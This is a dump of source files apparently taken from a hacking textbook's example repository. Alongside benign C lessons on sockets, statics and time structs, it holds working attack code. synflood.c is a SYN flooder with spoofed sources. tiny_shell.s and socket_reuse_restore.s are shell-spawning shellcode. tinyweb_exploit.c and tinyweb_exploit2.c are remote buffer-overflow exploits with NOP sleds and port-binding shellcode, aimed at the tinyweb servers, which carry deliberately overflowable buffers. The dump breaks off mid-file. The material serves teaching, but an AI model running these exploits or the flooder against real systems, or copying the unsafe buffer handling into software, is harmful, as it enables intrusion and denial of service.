-------------------------------------------------------------------------------- /simple_server.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <sys/socket.h> 5 | #include <netinet/in.h> 6 | #include <arpa/inet.h> 7 | #include "hacking.h" 8 | 9 | #define PORT 7890 // the port users will be connecting to 10 | 11 | int main(void) { 12 | int sockfd, new_sockfd; // listen on sock_fd, new connection on new_fd 13 | struct sockaddr_in host_addr, client_addr; // my address information 14 | socklen_t sin_size; 15 | int recv_length=1, yes=1; 16 | char buffer[1024]; 17 | 18 | if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) 19 | fatal("in socket"); 20 | 21 | if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) 22 | fatal("setting socket option SO_REUSEADDR"); 23 | 24 | host_addr.sin_family = AF_INET; // host byte order 25 | host_addr.sin_port = htons(PORT); // short, network byte order 26 | host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP 27 | memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct 28 | 29 | if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1) 30 | fatal("binding to socket"); 31 | 32 | if (listen(sockfd, 5) == -1) 33 | fatal("listening on socket"); 34 | 35 | while(1) { // Accept loop 36 | sin_size = sizeof(struct sockaddr_in); 37 | new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size); 38 | if(new_sockfd == -1) 39 | fatal("accepting connection"); 40 | printf("server: got connection from %s port %d\n",inet_ntoa(client_addr.sin_addr), ntohs(client_addr.sin_port)); 41 | send(new_sockfd, "Hello World!\n", 13, 0); 42 | recv_length = recv(new_sockfd, &buffer, 1024, 0); 43 | while(recv_length > 0) { 44 | printf("RECV: %d bytes\n", recv_length); 45 | dump(buffer, recv_length); 46 | recv_length = recv(new_sockfd, &buffer, 1024, 0); 47 | } 48 | close(new_sockfd); 49 | } 50 | return 0; 51 | } 52 | 53 | -------------------------------------------------------------------------------- /simplenote.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <fcntl.h> 5 | #include <sys/stat.h> 6 | 7 | void usage(char *prog_name, char *filename) { 8 | printf("Usage: %s <data to add to %s>\n", prog_name, filename); 9 | exit(0); 10 | } 11 | 12 | void fatal(char *); // a function for fatal errors 13 | void *ec_malloc(unsigned int); // an errorchecked malloc() wrapper 14 | 15 | int main(int argc, char *argv[]) { 16 | int fd; // file descriptor 17 | char *buffer, *datafile; 18 | 19 | buffer = (char *) ec_malloc(100); 20 | datafile = (char *) ec_malloc(20); 21 | strcpy(datafile, "/tmp/notes"); 22 | 23 | if(argc < 2) // If there aren't commandline arguments 24 | usage(argv[0], datafile); // display usage message and exit 25 | 26 | strcpy(buffer, argv[1]); // copy into buffer 27 | 28 | printf("[DEBUG] buffer @ %p: \'%s\'\n", buffer, buffer); 29 | printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile); 30 | 31 | strncat(buffer, "\n", 1); // add a newline on the end 32 | 33 | // Opening the file 34 | fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); 35 | if(fd == -1) 36 | fatal("in main() while opening file"); 37 | printf("[DEBUG] file descriptor is %d\n", fd); 38 | // Writing data 39 | if(write(fd, buffer, strlen(buffer)) == -1) 40 | fatal("in main() while writing buffer to file"); 41 | // Closing file 42 | if(close(fd) == -1) 43 | fatal("in main() while closing file"); 44 | 45 | printf("Note has been saved.\n"); 46 | free(buffer); 47 | free(datafile); 48 | } 49 | 50 | // A function to display an error message and then exit 51 | void fatal(char *message) { 52 | char error_message[100]; 53 | 54 | strcpy(error_message, "[!!] Fatal Error "); 55 | strncat(error_message, message, 83); 56 | perror(error_message); 57 | exit(-1); 58 | } 59 | 60 | // An error checked malloc() wrapper function 61 | void *ec_malloc(unsigned int size) { 62 | void *ptr; 63 | ptr = malloc(size); 64 | if(ptr == NULL) 65 | fatal("in ec_malloc() on memory allocation"); 66 | return ptr; 67 | } 68 | -------------------------------------------------------------------------------- /socket_reuse_restore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/socket_reuse_restore -------------------------------------------------------------------------------- /socket_reuse_restore.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | push BYTE 0x02 ; fork is syscall #2 4 | pop eax 5 | int 0x80 ; after the fork, in child process eax == 0 6 | test eax, eax 7 | jz child_process ; in child process spawn a shell 8 | 9 | ; in the parent process, restore tinywebd 10 | lea ebp, [esp+0x68] ; restore EBP 11 | push 0x08048fb7 ; return address 12 | ret ; return 13 | 14 | child_process: 15 | ; re-use existing socket 16 | lea edx, [esp+0x5c] ; put the address of new_sockfd in edx 17 | mov ebx, [edx] ; put the value of new_sockfd in ebx 18 | push BYTE 0x02 19 | pop ecx ; ecx starts at 2 20 | xor eax, eax 21 | xor edx, edx 22 | dup_loop: 23 | mov BYTE al, 0x3F ; dup2 syscall #63 24 | int 0x80 ; dup2(c, 0) 25 | dec ecx ; count down to 0 26 | jns dup_loop ; if the sign flag is not set, ecx is not negative 27 | 28 | 29 | ; execve(const char *filename, char *const argv [], char *const envp[]) 30 | mov BYTE al, 11 ; execve syscall #11 31 | push edx ; push some nulls for string termination 32 | push 0x68732f2f ; push "//sh" to the stack 33 | push 0x6e69622f ; push "/bin" to the stack 34 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 35 | push edx ; push 32-bit null terminator to stack 36 | mov edx, esp ; this is an empty array for envp 37 | push ebx ; push string addr to stack above null terminator 38 | mov ecx, esp ; this is the argv array with string ptr 39 | int 0x80 ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]) 40 | -------------------------------------------------------------------------------- /stack_example.c: -------------------------------------------------------------------------------- 1 | void test_function(int a, int b, int c, int d) { 2 | int flag; 3 | char buffer[10]; 4 | 5 | flag = 31337; 6 | buffer[0] = 'A'; 7 | } 8 | 9 | int main() { 10 | test_function(1, 2, 3, 4); 11 | } 12 | -------------------------------------------------------------------------------- /static.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | void function() { // an example function, with it's own context 4 | int var = 5; 5 | static int static_var = 5; // static variable initialization 6 | 7 | printf("\t[in function] var = %d\n", var); 8 | printf("\t[in function] static_var = %d\n", static_var); 9 | var++; // add one to var 10 | static_var++; // add one to static_var 11 | } 12 | 13 | int main() { // the main function, with it's own context 14 | int i; 15 | static int static_var = 1337; // another static, in a different context 16 | 17 | for(i=0; i < 5; i++) { // loop 5 times 18 | printf("[in main] static_var = %d\n", static_var); 19 | function(); // call the function 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /static2.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | void function() { // an example function, with it's own context 4 | int var = 5; 5 | static int static_var = 5; // static variable initialization 6 | 7 | printf("\t[in function] var @ %p = %d\n", &var, var); 8 | printf("\t[in function] static_var @ %p = %d\n", &static_var, static_var); 9 | var++; // add one to var 10 | static_var++; // add one to static_var 11 | } 12 | 13 | int main() { // the main function, with it's own context 14 | int i; 15 | static int static_var = 1337; // another static, in a different context 16 | 17 | for(i=0; i < 5; i++) { // loop 5 times 18 | printf("[in main] static_var @ %p = %d\n", &static_var, static_var); 19 | function(); // call the function 20 | } 21 | } 22 | 23 | -------------------------------------------------------------------------------- /synflood.c: -------------------------------------------------------------------------------- 1 | #include <libnet.h> 2 | 3 | #define FLOOD_DELAY 5000 // delay between packet injects by 5000 ms 4 | 5 | /* returns an IP in x.x.x.x notation */ 6 | char *print_ip(u_long *ip_addr_ptr) { 7 | return inet_ntoa( *((struct in_addr *)ip_addr_ptr) ); 8 | } 9 | 10 | 11 | int main(int argc, char *argv[]) { 12 | u_long dest_ip; 13 | u_short dest_port; 14 | u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; 15 | int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; 16 | 17 | if(argc < 3) 18 | { 19 | printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); 20 | exit(1); 21 | } 22 | 23 | dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host 24 | dest_port = (u_short) atoi(argv[2]); // the port 25 | 26 | 27 | network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface 28 | if (network == -1) 29 | libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); 30 | 31 | libnet_init_packet(packet_size, &packet); // allocate memory for packet 32 | if (packet == NULL) 33 | libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); 34 | 35 | libnet_seed_prand(); // seed the random number generator 36 | 37 | printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); 38 | while(1) // loop forever (until break by CTRL-C) 39 | { 40 | libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header 41 | IPTOS_LOWDELAY, // IP tos 42 | libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 43 | 0, // frag stuff 44 | libnet_get_prand(LIBNET_PR8), // TTL (randomized) 45 | IPPROTO_TCP, // transport protocol 46 | libnet_get_prand(LIBNET_PRu32), // source IP (randomized) 47 | dest_ip, // destination IP 48 | NULL, // payload (none) 49 | 0, // payload length 50 | packet); // packet header memory 51 | 52 | libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) 53 | dest_port, // destination TCP port 54 | libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) 55 | libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) 56 | TH_SYN, // control flags (SYN flag set only) 57 | libnet_get_prand(LIBNET_PRu16), // window size (randomized) 58 | 0, // urgent pointer 59 | NULL, // payload (none) 60 | 0, // payload length 61 | packet + LIBNET_IP_H); // packet header memory 62 | 63 | if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) 64 | libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); 65 | 66 | byte_count = libnet_write_ip(network, packet, packet_size); // inject packet 67 | if (byte_count < packet_size) 68 | libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); 69 | 70 | usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds 71 | } 72 | 73 | libnet_destroy_packet(&packet); // free packet memory 74 | 75 | if (libnet_close_raw_sock(network) == -1) // close the network interface 76 | libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); 77 | 78 | return 0; 79 | } 80 | 81 | 82 | -------------------------------------------------------------------------------- /time_example.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <time.h> 3 | 4 | int main() { 5 | long int seconds_since_epoch; 6 | struct tm current_time, *time_ptr; 7 | int hour, minute, second, day, month, year; 8 | 9 | seconds_since_epoch = time(0); // pass time a null pointer as argument 10 | printf("time() - seconds since epoch: %ld\n", seconds_since_epoch); 11 | 12 | time_ptr = &current_time; // set time_ptr to the address of 13 | // the current_time struct 14 | localtime_r(&seconds_since_epoch, time_ptr); 15 | 16 | // three different ways to access struct elements 17 | hour = current_time.tm_hour; // direct access 18 | minute = time_ptr->tm_min; // access via pointer 19 | second = *((int *) time_ptr); // hacky pointer access 20 | 21 | printf("Current time is: %02d:%02d:%02d\n", hour, minute, second); 22 | } 23 | 24 | 25 | -------------------------------------------------------------------------------- /time_example2.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <time.h> 3 | 4 | void dump_time_struct_bytes(struct tm *time_ptr, int size) { 5 | int i; 6 | unsigned char *raw_ptr; 7 | 8 | printf("bytes of struct located at 0x%08x\n", time_ptr); 9 | raw_ptr = (unsigned char *) time_ptr; 10 | for(i=0; i < size; i++) 11 | { 12 | printf("%02x ", raw_ptr[i]); 13 | if(i%16 == 15) // print a newline every 16 bytes 14 | printf("\n"); 15 | } 16 | printf("\n"); 17 | } 18 | 19 | int main() { 20 | long int seconds_since_epoch; 21 | struct tm current_time, *time_ptr; 22 | int hour, minute, second, i, *int_ptr; 23 | 24 | seconds_since_epoch = time(0); // pass time a null pointer as argument 25 | printf("time() - seconds since epoch: %ld\n", seconds_since_epoch); 26 | 27 | time_ptr = &current_time; // set time_ptr to the address of 28 | // the current_time struct 29 | localtime_r(&seconds_since_epoch, time_ptr); 30 | 31 | // three different ways to access struct elements 32 | hour = current_time.tm_hour; // direct access 33 | minute = time_ptr->tm_min; // access via pointer 34 | second = *((int *) time_ptr); // hacky pointer access 35 | 36 | printf("Current time is: %02d:%02d:%02d\n", hour, minute, second); 37 | 38 | dump_time_struct_bytes(time_ptr, sizeof(struct tm)); 39 | 40 | minute = hour = 0; // clear out minute and hour 41 | int_ptr = (int *) time_ptr; 42 | 43 | for(i=0; i < 3; i++) { 44 | printf("int_ptr @ 0x%08x : %d\n", int_ptr, *int_ptr); 45 | int_ptr++; // adding 1 to int_ptr adds 4 to the address, 46 | } // since an int is 4 bytes in size 47 | } 48 | 49 | 50 | -------------------------------------------------------------------------------- /tiny_shell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/shichao-an/hacking/8387734ae2c95ef7dda0f7c880d2d2c4e6606977/tiny_shell -------------------------------------------------------------------------------- /tiny_shell.s: -------------------------------------------------------------------------------- 1 | BITS 32 2 | 3 | ; execve(const char *filename, char *const argv [], char *const envp[]) 4 | xor eax, eax ; zero our eax 5 | push eax ; push some nulls for string termination 6 | push 0x68732f2f ; push "//sh" to the stack 7 | push 0x6e69622f ; push "/bin" to the stack 8 | mov ebx, esp ; put the address of "/bin//sh" into ebx, via esp 9 | push eax ; push 32-bit null terminator to stack 10 | mov edx, esp ; this is an empty array for envp 11 | push ebx ; push string addr to stack above null terminator 12 | mov ecx, esp ; this is the argv array with string ptr 13 | mov al, 11 ; syscall #11 14 | int 0x80 ; do it 15 | 16 | -------------------------------------------------------------------------------- /tinyweb.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <fcntl.h> 3 | #include <stdlib.h> 4 | #include <string.h> 5 | #include <sys/stat.h> 6 | #include <sys/socket.h> 7 | #include <netinet/in.h> 8 | #include <arpa/inet.h> 9 | #include "hacking.h" 10 | #include "hacking-network.h" 11 | 12 | #define PORT 80 // the port users will be connecting to 13 | #define WEBROOT "./webroot" // the web server's root directory 14 | 15 | void handle_connection(int, struct sockaddr_in *); // handle web requests 16 | int get_file_size(int); // returns the filesize of open file descriptor 17 | 18 | int main(void) { 19 | int sockfd, new_sockfd, yes=1; 20 | struct sockaddr_in host_addr, client_addr; // my address information 21 | socklen_t sin_size; 22 | 23 | printf("Accepting web requests on port %d\n", PORT); 24 | 25 | if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) 26 | fatal("in socket"); 27 | 28 | if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) 29 | fatal("setting socket option SO_REUSEADDR"); 30 | 31 | host_addr.sin_family = AF_INET; // host byte order 32 | host_addr.sin_port = htons(PORT); // short, network byte order 33 | host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP 34 | memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct 35 | 36 | if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1) 37 | fatal("binding to socket"); 38 | 39 | if (listen(sockfd, 20) == -1) 40 | fatal("listening on socket"); 41 | 42 | while(1) { // Accept loop 43 | sin_size = sizeof(struct sockaddr_in); 44 | new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size); 45 | if(new_sockfd == -1) 46 | fatal("accepting connection"); 47 | 48 | handle_connection(new_sockfd, &client_addr); 49 | } 50 | return 0; 51 | } 52 | 53 | /* This function handles the connection on the passed socket from the 54 | * passed client address. The connection is processed as a web request 55 | * and this function replies over the connected socket. Finally, the 56 | * passed socket is closed at the end of the function. 57 | */ 58 | void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) { 59 | unsigned char *ptr, request[500], resource[500]; 60 | int fd, length; 61 | 62 | length = recv_line(sockfd, request); 63 | 64 | printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request); 65 | 66 | ptr = strstr(request, " HTTP/"); // search for valid looking request 67 | if(ptr == NULL) { // then this isn't valid HTTP 68 | printf(" NOT HTTP!\n"); 69 | } else { 70 | *ptr = 0; // terminate the buffer at the end of the URL 71 | ptr = NULL; // set ptr to NULL (used to flag for an invalid request) 72 | if(strncmp(request, "GET ", 4) == 0) // get request 73 | ptr = request+4; // ptr is the URL 74 | if(strncmp(request, "HEAD ", 5) == 0) // head request 75 | ptr = request+5; // ptr is the URL 76 | 77 | if(ptr == NULL) { // then this is not a recognized request 78 | printf("\tUNKNOWN REQUEST!\n"); 79 | } else { // valid request, with ptr pointing to the resource name 80 | if (ptr[strlen(ptr) - 1] == '/') // for resources ending with '/' 81 | strcat(ptr, "index.html"); // add 'index.html' to the end 82 | strcpy(resource, WEBROOT); // begin resource with web root path 83 | strcat(resource, ptr); // and join it with resource path 84 | fd = open(resource, O_RDONLY, 0); // try to open the file 85 | printf("\tOpening \'%s\'\t", resource); 86 | if(fd == -1) { // if file is not found 87 | printf(" 404 Not Found\n"); 88 | send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n"); 89 | send_string(sockfd, "Server: Tiny webserver\r\n\r\n"); 90 | send_string(sockfd, "<html><head><title>404 Not Found</title></head>"); 91 | send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n"); 92 | } else { // otherwise, serve up the file 93 | printf(" 200 OK\n"); 94 | send_string(sockfd, "HTTP/1.0 200 OK\r\n"); 95 | send_string(sockfd, "Server: Tiny webserver\r\n\r\n"); 96 | if(ptr == request + 4) { // then this is a GET request 97 | if( (length = get_file_size(fd)) == -1) 98 | fatal("getting resource file size"); 99 | if( (ptr = (unsigned char *) malloc(length)) == NULL) 100 | fatal("allocating memory for reading resource"); 101 | read(fd, ptr, length); // read the file into memory 102 | send(sockfd, ptr, length, 0); // send it to socket 103 | free(ptr); // free file memory 104 | } 105 | close(fd); // close the file 106 | } // end if block for file found/not found 107 | } // end if block for valid request 108 | } // end if block for valid HTTP 109 | shutdown(sockfd, SHUT_RDWR); // close the socket gracefully 110 | } 111 | 112 | /* This function accepts an open file descriptor and returns 113 | * the size of the associated file. Returns -1 on failure. 114 | */ 115 | int get_file_size(int fd) { 116 | struct stat stat_struct; 117 | 118 | if(fstat(fd, &stat_struct) == -1) 119 | return -1; 120 | return (int) stat_struct.st_size; 121 | } 122 | -------------------------------------------------------------------------------- /tinyweb_exploit.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <sys/socket.h> 5 | #include <netinet/in.h> 6 | #include <arpa/inet.h> 7 | #include <netdb.h> 8 | 9 | #include "hacking.h" 10 | #include "hacking-network.h" 11 | 12 | char shellcode[]= 13 | "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68" 14 | "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89" 15 | "\xe1\xcd\x80"; // standard shellcode 16 | 17 | #define OFFSET 540 18 | #define RETADDR 0xbffff688 19 | 20 | int main(int argc, char *argv[]) { 21 | int sockfd, buflen; 22 | struct hostent *host_info; 23 | struct sockaddr_in target_addr; 24 | unsigned char buffer[600]; 25 | 26 | if(argc < 2) { 27 | printf("Usage: %s <hostname>\n", argv[0]); 28 | exit(1); 29 | } 30 | 31 | if((host_info = gethostbyname(argv[1])) == NULL) 32 | fatal("looking up hostname"); 33 | 34 | if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) 35 | fatal("in socket"); 36 | 37 | target_addr.sin_family = AF_INET; 38 | target_addr.sin_port = htons(80); 39 | target_addr.sin_addr = *((struct in_addr *)host_info->h_addr); 40 | memset(&(target_addr.sin_zero), '\0', 8); // zero the rest of the struct 41 | 42 | if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) 43 | fatal("connecting to target server"); 44 | 45 | bzero(buffer, 600); // zero out the buffer 46 | memset(buffer, '\x90', OFFSET); // build a NOP sled 47 | *((u_int *)(buffer + OFFSET)) = RETADDR; // put the return address in 48 | memcpy(buffer+300, shellcode, strlen(shellcode)); // shellcode 49 | strcat(buffer, "\r\n"); // terminate the string 50 | printf("Exploit buffer:\n"); 51 | dump(buffer, strlen(buffer)); // show the exploit buffer 52 | send_string(sockfd, buffer); // send exploit buffer as a HTTP request 53 | 54 | exit(0); 55 | } 56 | -------------------------------------------------------------------------------- /tinyweb_exploit2.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | #include <string.h> 4 | #include <sys/socket.h> 5 | #include <netinet/in.h> 6 | #include <arpa/inet.h> 7 | #include <netdb.h> 8 | 9 | #include "hacking.h" 10 | #include "hacking-network.h" 11 | 12 | char shellcode[]= 13 | "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80" 14 | "\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10" 15 | "\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80" 16 | "\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f" 17 | "\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" 18 | "\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"; 19 | // port-binding shellcode on port 31337 20 | 21 | #define OFFSET 540 22 | #define RETADDR 0xbffff688 23 | 24 | int main(int argc, char *argv[]) { 25 | int sockfd, buflen; 26 | struct hostent *host_info; 27 | struct sockaddr_in target_addr; 28 | unsigned char buffer[600]; 29 | 30 | if(argc < 2) { 31 | printf("Usage: %s <hostname>\n", argv[0]); 32 | exit(1); 33 | } 34 | 35 | if((host_info = gethostbyname(argv[1])) == NULL) 36 | fatal("looking up hostname"); 37 | 38 | if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) 39 | fatal("in socket"); 40 | 41 | target_addr.sin_family = AF_INET; 42 | target_addr.sin_port = htons(80); 43 | target_addr.sin_addr = *((struct in_addr *)host_info->h_addr); 44 | memset(&(target_addr.sin_zero), '\0', 8); // zero the rest of the struct 45 | 46 | if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) 47 | fatal("connecting to target server"); 48 | 49 | bzero(buffer, 600); // zero out the buffer 50 | memset(buffer, '\x90', OFFSET); // build a NOP sled 51 | *((u_int *)(buffer + OFFSET)) = RETADDR; // put the return address in 52 | memcpy(buffer+300, shellcode, strlen(shellcode)); // shellcode 53 | strcat(buffer, "\r\n"); // terminate the string 54 | printf("Exploit buffer:\n"); 55 | dump(buffer, strlen(buffer)); // show the exploit buffer 56 | send_string(sockfd, buffer); // send exploit buffer as a HTTP request 57 | 58 | exit(0); 59 | } 60 | -------------------------------------------------------------------------------- /tinywebd.c: -------------------------------------------------------------------------------- 1 | #include <sys/stat.h> 2 | #include <sys/socket.h> 3 | #include <netinet/in.h> 4 | #include <arpa/inet.h> 5 | #include <sys/types.h> 6 | #include <sys/stat.h> 7 | #include <fcntl.h> 8 | #include <time.h> 9 | #include <signal.h> 10 | #include "hacking.h" 11 | #include "hacking-network.h" 12 | 13 | #define PORT 80 // the port users will be connecting to 14 | #define WEBROOT "./webroot" // the web server's root directory 15 | #define LOGFILE "/var/log/tinywebd.log" // log filename 16 | 17 | int logfd, sockfd; // global log and socket file descriptors 18 | void handle_connection(int, struct sockaddr_in *, int); 19 | int get_file_size(int); // returns the filesize of open file descriptor 20 | void timestamp(int); // writes a timestamp to the open file descriptor 21 | 22 | // This function is called when the process is killed 23 | void handle_shutdown(int signal) { 24 | timestamp(logfd); 25 | write(logfd, "Shutting down..\n", 16); 26 | close(logfd); 27 | close(sockfd); 28 | exit(0); 29 | } 30 | 31 | int main(void) { 32 | int new_sockfd, yes=1; 33 | struct sockaddr_in host_addr, client_addr; // my address information 34 | socklen_t sin_size; 35 | 36 | logfd = open(LOGFILE, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR); 37 | if(logfd == -1) 38 | fatal("opening log file"); 39 | 40 | if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) 41 | fatal("in socket"); 42 | 43 | if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1) 44 | fatal("setting socket option SO_REUSEADDR"); 45 | 46 | printf("Starting tiny web daemon..\n"); 47 | if(daemon(1, 0) == -1) // fork to a background daemon process 48 | fatal("forking to daemon process"); 49 | 50 | signal(SIGTERM, handle_shutdown); // call handle_shutdown when killed 51 | signal(SIGINT, handle_shutdown); // call handle_shutdown when interrupted 52 | 53 | timestamp(logfd); 54 | write(logfd, "Starting up..\n", 15); 55 | host_addr.sin_family = AF_INET; // host byte order 56 | host_addr.sin_port = htons(PORT); // short, network byte order 57 | host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP 58 | memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct 59 | 60 | if (bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr)) == -1) 61 | fatal("binding to socket"); 62 | 63 | if (listen(sockfd, 20) == -1) 64 | fatal("listening on socket"); 65 | 66 | while(1) { // Accept loop 67 | sin_size = sizeof(struct sockaddr_in); 68 | new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size); 69 | if(new_sockfd == -1) 70 | fatal("accepting connection"); 71 | 72 | handle_connection(new_sockfd, &client_addr, logfd); 73 | } 74 | return 0; 75 | } 76 | 77 | /* This function handles the connection on the passed socket from the 78 | * passed client address and logs to the passed FD. The connection is 79 | * processed as a web request and this function replies over the connected 80 | * socket. Finally, the passed socket is closed at the end of the function. 81 | */ 82 | void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) { 83 | unsigned char *ptr, request[500], resource[500], log_buffer[500]; 84 | int fd, length; 85 | 86 | length = recv_line(sockfd, request); 87 | 88 | sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request); 89 | 90 | ptr = strstr(request, " HTTP/"); // search for valid looking request 91 | if(ptr == NULL) { // then this isn't valid HTTP 92 | strcat(log_buffer, " NOT HTTP!\n"); 93 | } else { 94 | *ptr = 0; // terminate the buffer at the end of the URL 95 | ptr = NULL; // set ptr to NULL (used to flag for an invalid request) 96 | if(strncmp(request, "GET ", 4) == 0) // get request 97 | ptr = request+4; // ptr is the URL 98 | if(strncmp(request, "HEAD ", 5) == 0) // head request 99 | ptr = request+5; // ptr is the URL 100 | if(ptr == NULL) { // then this is not a recognized request 101 | strcat(log_buffer, " UNKNOWN REQUEST!\n"); 102 | } else { // valid request, with ptr pointing to the resource name 103 | if (ptr[strlen(ptr) - 1] == '/') // for resources ending with '/' 104 | strcat(ptr, "index.html"); // add 'index.html' to the end 105 | strcpy(resource, WEBROOT); // begin resource with web root path 106 | strcat(resource, ptr); // and join it with resource path 107 | fd = open(resource, O_RDONLY, 0); // try to open the file 108 | if(fd == -1) { // if file is not found 109 | strcat(log_buffer, " 404 Not Found\n"); 110 | send_string(sockfd, "HTTP/1.0 404 NOT FOUND\r\n"); 111 | send_string(sockfd, "Server: Tiny webserver\r\n\r\n"); 112 | send_string(sockfd, "<html><head><title>404 Not Found</title></head>"); 113 | send_string(sockfd, "<body><h1>URL not found</h1></body></html>\r\n"); 114 | } else { // otherwise, serve up the file 115 | strcat(log_buffer, " 200 OK\n"); 116 | send_string(sockfd, "HTTP/1.0 200 OK\r\n"); 117 | send_string(sockfd, "Server: Tiny webserver\r\n\r\n"); 118 | if(ptr == request + 4) { // then this is a GET request 119 | if( (length = get_file_size(fd)) == -1) 120 | fatal("getting resource file size"); 121 | if( (ptr = (unsigned char *) malloc(length)) == NULL) 122 | fatal("allocating memory for reading resource"); 123 | read(fd, ptr, length); // read the file into memory 124 | send(sockfd, ptr, length, 0); // send it to socket 125 | free(ptr); // free file memory 126 | } 127 | close(fd); // close the file 128 | } // end if block for file found/not found 129 | } // end if block for valid request 130 | } // end if block for valid HTTP 131 | timestamp(logfd); 132 | length = strlen(log_buffer); 133 | write(logfd, log_buffer, length); // write to the log 134 | 135 | shutdown(sockfd, SHUT_RDWR); // close the socket gracefully 136 | } 137 | 138 | /* This function accepts an open file descriptor and returns 139 | * the size of the associated file. Returns -1 on failure. 140 | */ 141 | int get_file_size(int fd) { 142 | struct stat stat_struct; 143 | 144 | if(fstat(fd, &stat_struct) == -1) 145 | return -1; 146 | return (int) stat_struct.st_size; 147 | } 148 | 149 | /* This function writes a timestamp string to the open file descriptor 150 | * passed to it. 151 | */ 152 | void timestamp(fd) { 153 | time_t now; 154 | struct tm *time_struct; 155 | int length; 156 | char time_buffer[40]; 157 | 158 | time(&now); // get number of seconds since epoch 159 | time_struct = localtime((const time_t *)&now); // convert to tm struct 160 | length = strftime(time_buffer, 40, "%m/%d/%Y %H:%M:%S> ", time_struct); 161 | write(fd, time_buffer, length); // write timestamp string to log 162 | } 163 | -------------------------------------------------------------------------------- /typecasting.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | 3 | int main() { 4 | int a, b; 5 | float 